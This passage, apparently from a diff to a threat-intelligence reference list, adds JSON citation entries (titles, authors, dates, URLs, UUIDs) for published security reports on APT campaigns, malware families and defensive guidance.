Hospitality" + }, + "related": [], + "uuid": "3247c03a-a57c-4945-9b85-72a70719e1cd", + "value": "Kaspersky Darkhotel" + }, + { + "description": "Dumont, R., M.Léveillé, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020.", + "meta": { + "date_accessed": "2020-07-16T00:00:00Z", + "date_published": "2018-12-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf" + ], + "source": "MITRE", + "title": "THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors" + }, + "related": [], + "uuid": "0e25bf8b-3c9e-4661-a9fd-79b2ad3b8dd2", + "value": "ESET ForSSHe December 2018" + }, + { + "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, July 8). The Dropping Elephant – aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016.", + "meta": { + "date_accessed": "2016-08-03T00:00:00Z", + "date_published": "2016-07-08T00:00:00Z", + "refs": [ + "https://securelist.com/the-dropping-elephant-actor/75328/" + ], + "source": "MITRE", + "title": "The Dropping Elephant – aggressive cyber-espionage in the Asian region" + }, + "related": [], + "uuid": "2efa655f-ebd3-459b-9fd7-712d3f4ba1f8", + "value": "Securelist Dropping Elephant" + }, + { + "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", + "meta": { + "date_accessed": "2015-12-10T00:00:00Z", + "date_published": "2015-09-17T00:00:00Z", + "refs": [ + "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + ], + "source": "MITRE", + "title": "The Dukes: 7 years of Russian cyberespionage" + }, + "related": [], + "uuid": "cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27", + "value": "F-Secure The Dukes" + }, + { + "description": "Kaspersky Lab. (2015, June 11). The Duqu 2.0. Retrieved April 21, 2017.", + "meta": { + "date_accessed": "2017-04-21T00:00:00Z", + "date_published": "2015-06-11T00:00:00Z", + "refs": [ + "https://securelist.com/files/2015/06/The_Mystery_of_Duqu_2_0_a_sophisticated_cyberespionage_actor_returns.pdf" + ], + "source": "MITRE", + "title": "The Duqu 2.0" + }, + "related": [], + "uuid": "b4d6db03-1587-4af3-87ff-51542ef7c87b", + "value": "Kaspersky Duqu 2.0" + }, + { + "description": "O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.", + "meta": { + "date_accessed": "2018-02-15T00:00:00Z", + "date_published": "2012-09-06T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf" + ], + "source": "MITRE", + "title": "The Elderwood Project" + }, + "related": [], + "uuid": "5e908748-d260-42f1-a599-ac38b4e22559", + "value": "Symantec Elderwood Sept 2012" + }, + { + "description": "Kaspersky Lab's Global Research & Analysis Team. (2014, August 06). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroboros. Retrieved November 7, 2018.", + "meta": { + "date_accessed": "2018-11-07T00:00:00Z", + "date_published": "2014-08-06T00:00:00Z", + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08080105/KL_Epic_Turla_Technical_Appendix_20140806.pdf" + ], + "source": "MITRE", + "title": "The Epic Turla Operation: Solving some of the mysteries of Snake/Uroboros" + }, + "related": [], + "uuid": "52577f34-0aa6-4765-9f6b-dd7397183223", + "value": "Kaspersky Turla Aug 2014" + }, + { + "description": "Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.", + "meta": { + "date_accessed": "2014-12-11T00:00:00Z", + "date_published": "2014-08-07T00:00:00Z", + "refs": [ + "https://securelist.com/the-epic-turla-operation/65545/" + ], + "source": "MITRE, Tidal Cyber", + "title": "The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos" + }, + "related": [], + "uuid": "535e9f1a-f89e-4766-a290-c5b8100968f8", + "value": "Kaspersky Turla" + }, + { + "description": "Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.", + "meta": { + "date_accessed": "2016-01-22T00:00:00Z", + "date_published": "2015-12-20T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html" + ], + "source": "MITRE, Tidal Cyber", + "title": "The EPS Awakens - Part 2" + }, + "related": [], + "uuid": "7fd58ef5-a0b7-40b6-8771-ca5e87740965", + "value": "FireEye EPS Awakens Part 2" + }, + { + "description": "Symantec. (2018, July 18). The Evolution of Emotet: From Banking Trojan to Threat Distributor. Retrieved March 25, 2019.", + "meta": { + "date_accessed": "2019-03-25T00:00:00Z", + "date_published": "2018-07-18T00:00:00Z", + "refs": [ + "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor" + ], + "source": "MITRE", + "title": "The Evolution of Emotet: From Banking Trojan to Threat Distributor" + }, + "related": [], + "uuid": "b94b5be4-1c77-48e1-875e-0cff0023fbd9", + "value": "Symantec Emotet Jul 2018" + }, + { + "description": "Christensen, L.. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018.", + "meta": { + "date_accessed": "2018-12-08T00:00:00Z", + "date_published": "2015-12-28T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20190508170150/https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/" + ], + "source": "MITRE", + "title": "The Evolution of Offensive PowerShell Invocation" + }, + "related": [], + "uuid": "8eec1af3-c65e-4522-8087-73122ac6c281", + "value": "SilentBreak Offensive PS Dec 2015" + }, + { + "description": "Meyers, Adam. (2021, July 6). The Evolution of PINCHY SPIDER from GandCrab to REvil. Retrieved March 28, 2023.", + "meta": { + "date_accessed": "2023-03-28T00:00:00Z", + "date_published": "2021-07-06T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/" + ], + "source": "MITRE", + "title": "The Evolution of PINCHY SPIDER from GandCrab to REvil" + }, + "related": [], + "uuid": "7578541b-1ae3-58d0-a8b9-120bd6cd96f5", + "value": "CrowdStrike Evolution of Pinchy Spider July 2021" + }, + { + "description": "Selena Larson, Daniel Blackford, Garrett G. (2021, June 16). The First Step: Initial Access Leads to Ransomware. Retrieved January 24, 2024.", + "meta": { + "date_accessed": "2024-01-24T00:00:00Z", + "date_published": "2021-06-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware" + ], + "source": "Tidal Cyber", + "title": "The First Step: Initial Access Leads to Ransomware" + }, + "related": [], + "uuid": "3b0631ae-f589-4b7c-a00a-04dcd5f3a77b", + "value": "Proofpoint Ransomware Initial Access June 2021" + }, + { + "description": "Gostev, A. (2012, May 28). The Flame: Questions and Answers. Retrieved March 1, 2017.", + "meta": { + "date_accessed": "2017-03-01T00:00:00Z", + "date_published": "2012-05-28T00:00:00Z", + "refs": [ + "https://securelist.com/the-flame-questions-and-answers-51/34344/" + ], + "source": "MITRE", + "title": "The Flame: Questions and Answers" + }, + "related": [], + "uuid": "6db8f76d-fe38-43b1-ad85-ad372da9c09d", + "value": "Kaspersky Flame" + }, + { + "description": "Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020.", + "meta": { + "date_accessed": "2020-06-02T00:00:00Z", + "date_published": "2018-11-29T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/" + ], + "source": "MITRE", + "title": "The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia" + }, + "related": [], + "uuid": "6986a64a-5fe6-4697-b70b-79cccaf3d730", + "value": "Unit 42 CARROTBAT November 2018" + }, + { + "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.", + "meta": { + "date_accessed": "2017-03-01T00:00:00Z", + "date_published": "2017-02-27T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/" + ], + "source": "MITRE, Tidal Cyber", + "title": "The Gamaredon Group Toolset Evolution" + }, + "related": [], + "uuid": "3f9a6343-1db3-4696-99ed-f22c6eabee71", + "value": "Palo Alto Gamaredon Feb 2017" + }, + { + "description": "GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2010-02-05T00:00:00Z", + "refs": [ + "https://www.gnu.org/software/acct/" + ], + "source": "MITRE", + "title": "The GNU Accounting Utilities" + }, + "related": [], + "uuid": "ef3edd44-b8d1-4d7d-a0d8-0e75aa441eac", + "value": "GNU Acct" + }, + { + "description": "glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020.", + "meta": { + "date_accessed": "2020-06-25T00:00:00Z", + "date_published": "2020-02-01T00:00:00Z", + "refs": [ + "https://www.gnu.org/software/libc/" + ], + "source": "MITRE", + "title": "The GNU C Library (glibc)" + }, + "related": [], + "uuid": "75a6a1bf-a5a7-419d-b290-6662aeddb7eb", + "value": "GLIBC" + }, + { + "description": "Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020.", + "meta": { + "date_accessed": "2020-07-23T00:00:00Z", + "date_published": "2020-06-25T00:00:00Z", + "refs": [ + "https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/" + ], + "source": "MITRE", + "title": "The Golden Tax Department and Emergence of GoldenSpy Malware" + }, + "related": [], + "uuid": "2a27a2ea-2815-4d97-88c0-47a6e04e84f8", + "value": "Trustwave GoldenSpy June 2020" + }, + { + "description": "Raggi, M. et al. (2022, March 7). The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates. Retrieved March 16, 2022.", + "meta": { + "date_accessed": "2022-03-16T00:00:00Z", + "date_published": "2022-03-07T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european" + ], + "source": "MITRE", + "title": "The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates" + }, + "related": [], + "uuid": "5731d7e4-dd19-4d08-b493-7b1a467599d3", + "value": "Proofpoint TA416 Europe March 2022" + }, + { + "description": "Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.", + "meta": { + "date_accessed": "2018-08-07T00:00:00Z", + "date_published": "2018-08-02T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ], + "source": "MITRE, Tidal Cyber", + "title": "The Gorgon Group: Slithering Between Nation State and Cybercrime" + }, + "related": [], + "uuid": "d0605185-3f8d-4846-a718-15572714e15b", + "value": "Unit 42 Gorgon Group Aug 2018" + }, + { + "description": "Roland Dela Paz. (2003, January 3). The HeartBeat APT Campaign. Retrieved October 17, 2021.", + "meta": { + "date_accessed": "2021-10-17T00:00:00Z", + "date_published": "2003-01-03T00:00:00Z", + "refs": [ + "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the-heartbeat-apt-campaign.pdf?" + ], + "source": "MITRE", + "title": "The HeartBeat APT Campaign" + }, + "related": [], + "uuid": "f42a36c2-1ca5-49ff-a7ec-7de90379a6d5", + "value": "Trend Micro HeartBeat Campaign January 2013" + }, + { + "description": "Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.", + "meta": { + "date_accessed": "2016-06-06T00:00:00Z", + "date_published": "2012-08-20T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html" + ], + "source": "MITRE", + "title": "The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1)" + }, + "related": [], + "uuid": "65d751cb-fdd2-4a45-81db-8a5a11bbee62", + "value": "FireEye Hikit Rootkit" + }, + { + "description": "Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.", + "meta": { + "date_accessed": "2020-05-04T00:00:00Z", + "date_published": "2012-08-22T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html" + ], + "source": "MITRE", + "title": "The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2)" + }, + "related": [], + "uuid": "48448972-a5ed-4371-b930-b51dcb174b82", + "value": "FireEye HIKIT Rootkit Part 2" + }, + { + "description": "Proofpoint. (n.d.). The Human Factor 2023: Analyzing the cyber attack chain. Retrieved July 20, 2023.", + "meta": { + "date_accessed": "2023-07-20T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/sites/default/files/threat-reports/pfpt-us-tr-human-factor-report.pdf" + ], + "source": "MITRE", + "title": "The Human Factor 2023: Analyzing the cyber attack chain" + }, + "related": [], + "uuid": "143e191f-9175-557b-8fe1-41dbe04867a6", + "value": "Proofpoint Human Factor" + }, + { + "description": "Wilson, B. (2016, April 18). The Importance of KB2871997 and KB2928120 for Credential Protection. Retrieved April 11, 2018.", + "meta": { + "date_accessed": "2018-04-11T00:00:00Z", + "date_published": "2016-04-18T00:00:00Z", + "refs": [ + "https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/" + ], + "source": "MITRE", + "title": "The Importance of KB2871997 and KB2928120 for Credential Protection" + }, + "related": [], + "uuid": "88367099-df19-4044-8c9b-2db4c9f418c4", + "value": "TechNet Blogs Credential Protection" + }, + { + "description": "U.S. Department of Homeland Security. (2016, August 30). The Increasing Threat to Network Infrastructure Devices and Recommended Mitigations. Retrieved July 29, 2022.", + "meta": { + "date_accessed": "2022-07-29T00:00:00Z", + "date_published": "2016-08-30T00:00:00Z", + "refs": [ + "https://cyber.dhs.gov/assets/report/ar-16-20173.pdf" + ], + "source": "MITRE", + "title": "The Increasing Threat to Network Infrastructure Devices and Recommended Mitigations" + }, + "related": [], + "uuid": "f1d16045-d365-43d2-bc08-65ba1ddbe0fd", + "value": "dhs_threat_to_net_devices" + }, + { + "description": "Parys, B. (2017, February 11). The KeyBoys are back in town. Retrieved June 13, 2019.", + "meta": { + "date_accessed": "2019-06-13T00:00:00Z", + "date_published": "2017-02-11T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20211129064701/https://www.pwc.co.uk/issues/cyber-security-services/research/the-keyboys-are-back-in-town.html" + ], + "source": "MITRE", + "title": "The KeyBoys are back in town" + }, + "related": [], + "uuid": "9ac6737b-c8a2-416f-bbc3-8c5556ad4833", + "value": "PWC KeyBoys Feb 2017" + }, + { + "description": "Tarakanov , D.. (2013, September 11). The “Kimsuky” Operation: A North Korean APT?. Retrieved August 13, 2019.", + "meta": { + "date_accessed": "2019-08-13T00:00:00Z", + "date_published": "2013-09-11T00:00:00Z", + "refs": [ + "https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/" + ], + "source": "MITRE", + "title": "The “Kimsuky” Operation: A North Korean APT?" + }, + "related": [], + "uuid": "f26771b0-2101-4fed-ac82-1bd9683dd7da", + "value": "Securelist Kimsuky Sept 2013" + }, + { + "description": "ClearSky Research Team. (2019, October 1). The Kittens Are Back in Town2 - Charming Kitten Campaign KeepsGoing on, Using New Impersonation Methods. Retrieved April 21, 2021.", + "meta": { + "date_accessed": "2021-04-21T00:00:00Z", + "date_published": "2019-10-01T00:00:00Z", + "refs": [ + "https://www.clearskysec.com/wp-content/uploads/2019/10/The-Kittens-Are-Back-in-Town-2-1.pdf" + ], + "source": "MITRE", + "title": "The Kittens Are Back in Town2 - Charming Kitten Campaign KeepsGoing on, Using New Impersonation Methods" + }, + "related": [], + "uuid": "f5114978-2528-4199-a586-0158c5f8a138", + "value": "ClearSky Kittens Back 2 Oct 2019" + }, + { + "description": "ClearSky Research Team. (2020, August 1). The Kittens Are Back in Town 3 - Charming Kitten Campaign Evolved and Deploying Spear-Phishing link by WhatsApp. Retrieved April 21, 2021.", + "meta": { + "date_accessed": "2021-04-21T00:00:00Z", + "date_published": "2020-08-01T00:00:00Z", + "refs": [ + "https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "The Kittens Are Back in Town 3 - Charming Kitten Campaign Evolved and Deploying Spear-Phishing link by WhatsApp" + }, + "related": [], + "uuid": "a10c6a53-79bb-4454-b444-cfb9136ecd36", + "value": "ClearSky Kittens Back 3 August 2020" + }, + { + "description": "The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021.", + "meta": { + "date_accessed": "2021-03-29T00:00:00Z", + "refs": [ + "https://kubernetes.io/docs/concepts/overview/kubernetes-api/" + ], + "source": "MITRE", + "title": "The Kubernetes API" + }, + "related": [], + "uuid": "5bdd1b82-9e5c-4db0-9764-240e37a1cc99", + "value": "Kubernetes API" + }, + { + "description": "Zanni, A. (n.d.). The LaZagne Project !!!. Retrieved December 14, 2018.", + "meta": { + "date_accessed": "2018-12-14T00:00:00Z", + "refs": [ + "https://github.com/AlessandroZ/LaZagne" + ], + "source": "MITRE", + "title": "The LaZagne Project !!!" + }, + "related": [], + "uuid": "9347b507-3a41-405d-87f9-d4fc2bfc48e5", + "value": "GitHub LaZagne Dec 2018" + }, + { + "description": "SecureWorks. (2013). The Lifecycle of Peer-to-Peer (Gameover) ZeuS. Retrieved August 19, 2015.", + "meta": { + "date_accessed": "2015-08-19T00:00:00Z", + "date_published": "2013-01-01T00:00:00Z", + "refs": [ + "http://www.secureworks.com/cyber-threat-intelligence/threats/The_Lifecycle_of_Peer_to_Peer_Gameover_ZeuS/" + ], + "source": "MITRE", + "title": "The Lifecycle of Peer-to-Peer (Gameover) ZeuS" + }, + "related": [], + "uuid": "773d1d91-a93c-4bb3-928b-4c3f82f2c889", + "value": "Dell P2P ZeuS" + }, + { + "description": "Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API. Retrieved June 25, 2020.", + "meta": { + "date_accessed": "2020-06-25T00:00:00Z", + "refs": [ + "https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html" + ], + "source": "MITRE", + "title": "The Linux Kernel API" + }, + "related": [], + "uuid": "0a30d54e-187a-43e0-9725-3c80aa1c7619", + "value": "Linux Kernel API" + }, + { + "description": "Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018.", + "meta": { + "date_accessed": "2018-04-06T00:00:00Z", + "date_published": "2003-04-04T00:00:00Z", + "refs": [ + "https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf" + ], + "source": "MITRE", + "title": "The Linux Kernel Module Programming Guide" + }, + "related": [], + "uuid": "70f31f19-e0b3-40b1-b8dd-6667557bb334", + "value": "Linux Kernel Programming" + }, + { + "description": "Villeneuve, N., Sancho, D. (2011). THE “LURID” DOWNLOADER. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "date_published": "2011-01-01T00:00:00Z", + "refs": [ + "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_dissecting-lurid-apt.pdf" + ], + "source": "MITRE", + "title": "THE “LURID” DOWNLOADER" + }, + "related": [], + "uuid": "ed5a2ec0-8328-40db-9f58-7eaac4ad39a0", + "value": "Villeneuve 2011" + }, + { + "description": "Microsoft Defender Threat Intelligence. (2022, June 13). The many lives of BlackCat ransomware. Retrieved December 20, 2022.", + "meta": { + "date_accessed": "2022-12-20T00:00:00Z", + "date_published": "2022-06-13T00:00:00Z", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/" + ], + "source": "MITRE", + "title": "The many lives of BlackCat ransomware" + }, + "related": [], + "uuid": "55be1ca7-fdb7-5d76-a9c8-5f44a0d00b0e", + "value": "Microsoft BlackCat Jun 2022" + }, + { + "description": "Maynor, D., Nikolic, A., Olney, M., and Younan, Y. (2017, July 5). The MeDoc Connection. Retrieved March 26, 2019.", + "meta": { + "date_accessed": "2019-03-26T00:00:00Z", + "date_published": "2017-07-05T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2017/07/the-medoc-connection.html" + ], + "source": "MITRE", + "title": "The MeDoc Connection" + }, + "related": [], + "uuid": "a055d7a2-a356-4f0e-9a66-7f7b3ac7e74a", + "value": "Talos Nyetya MEDoc 2017" + }, + { + "description": "Bill Marczak and John Scott-Railton. (2016, August 24). The Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE Human Rights Defender. Retrieved December 12, 2016.", + "meta": { + "date_accessed": "2016-12-12T00:00:00Z", + "date_published": "2016-08-24T00:00:00Z", + "refs": [ + "https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/" + ], + "source": "MITRE", + "title": "The Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE Human Rights Defender" + }, + "related": [], + "uuid": "d248e284-37d3-4425-a29e-5a0c814ae803", + "value": "PegasusCitizenLab" + }, + { + "description": "Kaspersky Lab's Global Research & Analysis Team. (2013, February 27). The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoor. Retrieved April 5, 2017.", + "meta": { + "date_accessed": "2017-04-05T00:00:00Z", + "date_published": "2013-02-27T00:00:00Z", + "refs": [ + "https://cdn.securelist.com/files/2014/07/themysteryofthepdf0-dayassemblermicrobackdoor.pdf" + ], + "source": "MITRE", + "title": "The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoor" + }, + "related": [], + "uuid": "def2a635-d322-4c27-9167-2642bf8f153c", + "value": "Securelist MiniDuke Feb 2013" + }, + { + "description": "Schroeder, W. (2017, January 10). The Most Dangerous User Right You (Probably) Have Never Heard Of. Retrieved March 5, 2019.", + "meta": { + "date_accessed": "2019-03-05T00:00:00Z", + "date_published": "2017-01-10T00:00:00Z", + "refs": [ + "http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/" + ], + "source": "MITRE", + "title": "The Most Dangerous User Right You (Probably) Have Never Heard Of" + }, + "related": [], + "uuid": "e8f7df08-1a62-41d9-b8a4-ff39a2160294", + "value": "Harmj0y SeEnableDelegationPrivilege Right" + }, + { + "description": "Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.", + "meta": { + "date_accessed": "2019-04-10T00:00:00Z", + "date_published": "2015-05-01T00:00:00Z", + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf" + ], + "source": "MITRE", + "title": "The MsnMM Campaigns: The Earliest Naikon APT Campaigns" + }, + "related": [], + "uuid": "09302b4f-7f71-4289-92f6-076c685f0810", + "value": "Baumgartner Naikon 2015" + }, + { + "description": "Ehrlich, A., et al. (2022, September). THE MYSTERY OF METADOR | AN UNATTRIBUTED THREAT HIDING IN TELCOS, ISPS, AND UNIVERSITIES. Retrieved January 23, 2023.", + "meta": { + "date_accessed": "2023-01-23T00:00:00Z", + "date_published": "2022-09-01T00:00:00Z", + "refs": [ + "https://assets.sentinelone.com/sentinellabs22/metador#page=1" + ], + "source": "MITRE", + "title": "THE MYSTERY OF METADOR | AN UNATTRIBUTED THREAT HIDING IN TELCOS, ISPS, AND UNIVERSITIES" + }, + "related": [], + "uuid": "137474b7-638a-56d7-9ce2-ab906f207175", + "value": "SentinelLabs Metador Sept 2022" + }, + { + "description": "Baumgartner, K., Golovkin, M.. (2015, May 14). The Naikon APT. Retrieved January 14, 2015.", + "meta": { + "date_accessed": "2015-01-14T00:00:00Z", + "date_published": "2015-05-14T00:00:00Z", + "refs": [ + "https://securelist.com/the-naikon-apt/69953/" + ], + "source": "MITRE", + "title": "The Naikon APT" + }, + "related": [], + "uuid": "5163576f-0b2c-49ba-8f34-b7efe3f3f6db", + "value": "Baumgartner Golovkin Naikon 2015" + }, + { + "description": "Patel, K. (2018, March 02). The NanoCore RAT Has Resurfaced From the Sewers. Retrieved November 9, 2018.", + "meta": { + "date_accessed": "2018-11-09T00:00:00Z", + "date_published": "2018-03-02T00:00:00Z", + "refs": [ + "https://cofense.com/nanocore-rat-resurfaced-sewers/" + ], + "source": "MITRE", + "title": "The NanoCore RAT Has Resurfaced From the Sewers" + }, + "related": [], + "uuid": "de31ba54-5634-48c5-aa57-c6b0dbb53870", + "value": "Cofense NanoCore Mar 2018" + }, + { + "description": "Kaspersky Lab's Global Research and Analysis Team. (n.d.). The NetTraveler (aka ‘Travnet’). Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "refs": [ + "http://www.securelist.com/en/downloads/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf" + ], + "source": "MITRE", + "title": "The NetTraveler (aka ‘Travnet’)" + }, + "related": [], + "uuid": "a7d4b322-3710-436f-bd51-e5c258073dba", + "value": "Kaspersky NetTraveler" + }, + { + "description": "Erye Hernandez and Danny Tsechansky. (2017, June 22). The New and Improved macOS Backdoor from OceanLotus. Retrieved September 8, 2023.", + "meta": { + "date_accessed": "2023-09-08T00:00:00Z", + "date_published": "2017-06-22T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/unit42-new-improved-macos-backdoor-oceanlotus/" + ], + "source": "MITRE", + "title": "The New and Improved macOS Backdoor from OceanLotus" + }, + "related": [], + "uuid": "fcaf57f1-6696-54a5-a78c-255c8f6ac235", + "value": "Unit42 OceanLotus 2017" + }, + { + "description": "CyberArk Labs. (2023, April 13). The (Not so) Secret War on Discord. Retrieved July 20, 2023.", + "meta": { + "date_accessed": "2023-07-20T00:00:00Z", + "date_published": "2023-04-13T00:00:00Z", + "refs": [ + "https://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord" + ], + "source": "MITRE", + "title": "The (Not so) Secret War on Discord" + }, + "related": [], + "uuid": "4b3cd2c0-fd0b-5583-8746-648229fc5f9d", + "value": "CyberArk Labs Discord" + }, + { + "description": "Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020.", + "meta": { + "date_accessed": "2020-07-15T00:00:00Z", + "date_published": "2019-03-25T00:00:00Z", + "refs": [ + "https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant" + ], + "source": "MITRE", + "title": "The odd case of a Gh0stRAT variant" + }, + "related": [], + "uuid": "88d7bf25-985a-4b5e-92d6-ec4fa47a314f", + "value": "Gh0stRAT ATT March 2019" + }, + { + "description": "Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.", + "meta": { + "date_accessed": "2017-05-03T00:00:00Z", + "date_published": "2016-05-26T00:00:00Z", + "refs": [ + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/" + ], + "source": "MITRE, Tidal Cyber", + "title": "The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor" + }, + "related": [], + "uuid": "53836b95-a30a-4e95-8e19-e2bb2f18c738", + "value": "Palo Alto OilRig May 2016" + }, + { + "description": "UCF. (n.d.). The password for the krbtgt account on a domain must be reset at least every 180 days. Retrieved November 5, 2020.", + "meta": { + "date_accessed": "2020-11-05T00:00:00Z", + "refs": [ + "https://www.stigviewer.com/stig/windows_server_2016/2019-12-12/finding/V-91779" + ], + "source": "MITRE", + "title": "The password for the krbtgt account on a domain must be reset at least every 180 days" + }, + "related": [], + "uuid": "a42fc58f-e7a7-46de-a2f4-25fa8498b3b3", + "value": "STIG krbtgt reset" + }, + { + "description": "Haq, T., Moran, N., Scott, M., & Vashisht, S. O. (2014, September 10). The Path to Mass-Producing Cyber Attacks [Blog]. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "date_published": "2014-09-10T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html" + ], + "source": "MITRE, Tidal Cyber", + "title": "The Path to Mass-Producing Cyber Attacks [Blog]" + }, + "related": [], + "uuid": "4e10228d-d9da-4ba4-bca7-d3bbdce42e0d", + "value": "Haq 2014" + }, + { + "description": "Baumgartner, K. and Raiu, C. (2014, December 8). The ‘Penquin’ Turla. Retrieved March 11, 2021.", + "meta": { + "date_accessed": "2021-03-11T00:00:00Z", + "date_published": "2014-12-08T00:00:00Z", + "refs": [ + "https://securelist.com/the-penquin-turla-2/67962/" + ], + "source": "MITRE", + "title": "The ‘Penquin’ Turla" + }, + "related": [], + "uuid": "957edb5c-b893-4968-9603-1a6b8577f3aa", + "value": "Kaspersky Turla Penquin December 2014" + }, + { + "description": "FireEye Labs. (2014, May 20). The PLA and the 8:00am-5:00pm Work Day: FireEye Confirms DOJ’s Findings on APT1 Intrusion Activity. Retrieved November 4, 2014.", + "meta": { + "date_accessed": 